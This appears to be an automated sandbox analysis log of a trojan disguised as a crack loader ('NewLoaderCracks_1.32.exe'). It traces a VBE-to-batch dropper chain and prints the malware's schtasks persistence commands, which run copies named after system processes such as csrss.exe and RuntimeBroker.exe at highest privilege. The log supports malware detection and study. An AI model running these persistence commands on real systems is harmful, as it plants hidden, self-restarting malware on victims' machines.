            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054857B0_2_0054857B
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054407E0_2_0054407E
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056D00E0_2_0056D00E
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005570BF0_2_005570BF
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005711940_2_00571194
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005602F60_2_005602F6
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005432810_2_00543281
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054E2A00_2_0054E2A0
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005566460_2_00556646
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056070E0_2_0056070E
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056473A0_2_0056473A
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005537C10_2_005537C1
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005427E80_2_005427E8
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054E8A00_2_0054E8A0
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054F9680_2_0054F968
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_005649690_2_00564969
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00556A7B0_2_00556A7B
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00553A3C0_2_00553A3C
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00560B430_2_00560B43
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056CB600_2_0056CB60
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00555C770_2_00555C77
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00553D6D0_2_00553D6D
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054ED140_2_0054ED14
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055FDFA0_2_0055FDFA
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054DE6C0_2_0054DE6C
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054BE130_2_0054BE13
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00560F780_2_00560F78
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00545F3C0_2_00545F3C
            Source: C:\comcontainer\SurrogateRef.exeCode function: 5_2_00007FFD346634E55_2_00007FFD346634E5
            Source: C:\comcontainer\SurrogateRef.exeCode function: 5_2_00007FFD346635655_2_00007FFD34663565
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeCode function: 14_2_00007FFD346534E514_2_00007FFD346534E5
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeCode function: 14_2_00007FFD3465356514_2_00007FFD34653565
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeCode function: 17_2_00007FFD346734E517_2_00007FFD346734E5
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeCode function: 17_2_00007FFD3467356517_2_00007FFD34673565
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: String function: 0055E28C appears 35 times
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: String function: 0055ED00 appears 31 times
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: String function: 0055E360 appears 52 times
            Source: SurrogateRef.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: csrss.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: NewLoaderCracks_1.32.exe, 00000000.00000003.2149562920.0000000005338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs NewLoaderCracks_1.32.exe
            Source: NewLoaderCracks_1.32.exe, 00000000.00000003.2150032734.00000000052B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs NewLoaderCracks_1.32.exe
            Source: NewLoaderCracks_1.32.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs NewLoaderCracks_1.32.exe
            Source: NewLoaderCracks_1.32.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: SurrogateRef.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: csrss.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, zPI4UC7j83EwXD93Buo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, zPI4UC7j83EwXD93Buo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, hDc22q36rjYl7cot4V2.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, hDc22q36rjYl7cot4V2.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, zPI4UC7j83EwXD93Buo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, zPI4UC7j83EwXD93Buo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, hDc22q36rjYl7cot4V2.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, hDc22q36rjYl7cot4V2.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, FcG67VRPX0ukIu8AsNZ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, FcG67VRPX0ukIu8AsNZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, FcG67VRPX0ukIu8AsNZ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, FcG67VRPX0ukIu8AsNZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@31/38@1/1
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00546EC9 GetLastError,FormatMessageW,0_2_00546EC9
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_00559E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00559E1C
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exeJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exeJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
            Source: C:\comcontainer\SurrogateRef.exeMutant created: \Sessions\1\BaseNamedObjects\Local\fbe2aa62d1fcbb1d2019c06a99ddb3c6bcd8fcaa
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9385A.tmpJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comcontainer\xNFGfK2ypxJsgsGsm5kX9.bat" "
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCommand line argument: sfxname0_2_0055D5D4
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCommand line argument: sfxstime0_2_0055D5D4
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCommand line argument: STARTDLG0_2_0055D5D4
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCommand line argument: xjY0_2_0055D5D4
            Source: NewLoaderCracks_1.32.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: NewLoaderCracks_1.32.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: NewLoaderCracks_1.32.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeFile read: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\NewLoaderCracks_1.32.exe "C:\Users\user\Desktop\NewLoaderCracks_1.32.exe"
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comcontainer\xNFGfK2ypxJsgsGsm5kX9.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\comcontainer\SurrogateRef.exe "C:\comcontainer\SurrogateRef.exe"
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe "C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe"
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe "C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe"
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogateRefS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows mail\SurrogateRef.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 14 /tr "'C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe'" /f
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comcontainer\xNFGfK2ypxJsgsGsm5kX9.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\comcontainer\SurrogateRef.exe "C:\comcontainer\SurrogateRef.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
